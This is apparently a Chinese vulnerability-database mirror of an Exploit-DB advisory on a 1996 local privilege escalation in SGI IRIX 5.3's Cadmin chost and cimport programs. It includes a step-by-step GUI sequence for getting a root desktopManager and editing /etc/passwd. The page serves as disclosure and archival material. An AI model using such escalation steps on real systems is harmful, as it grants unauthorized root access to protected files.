SGI IRIX 5.3 - 'Cadmin' Local Privilege Escalation

  • SGI IRIX 5.3 - 'Cadmin' Local Privilege Escalation已关闭评论
  • 4 views
  • A+
所属分类:安全客_漏洞

SGI IRIX 5.3 - 'Cadmin' Local Privilege Escalation

漏洞ID 1053342 漏洞类型
发布时间 1996-08-06 更新时间 1996-08-06
SGI IRIX 5.3 - 'Cadmin' Local Privilege EscalationCVE编号 N/A
SGI IRIX 5.3 - 'Cadmin' Local Privilege EscalationCNNVD-ID N/A
漏洞平台 IRIX CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/19268
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/335/info

A vulnerability exists in the chost and cimport programs, as shipped with SGI's Irix 5.x operating system. chost is part of the Cadmin package. By failing to validate the real userid, these programs allow any user to edit protected files, such as the passwd file.

/usr/Cadmin/bin/chost
tools-primary user information
change information
OK (to root password, ie leave blank)
OK (to "password invalid")
Cancel
Double-click any share resource to bring up desktopManager
running as root. Try editing /etc/passwd


/usr/Cadmin/bin/cimport
New
OK
OK
Cancel
double-click any of the mounted filesystems to bring up the desktopManager

相关推荐: wall daemon漏洞

wall daemon漏洞 漏洞ID 1207706 漏洞类型 未知 发布时间 1994-01-01 更新时间 1994-01-01 CVE编号 CVE-1999-0181 CNNVD-ID CNNVD-199401-001 漏洞平台 N/A CVSS评分 6…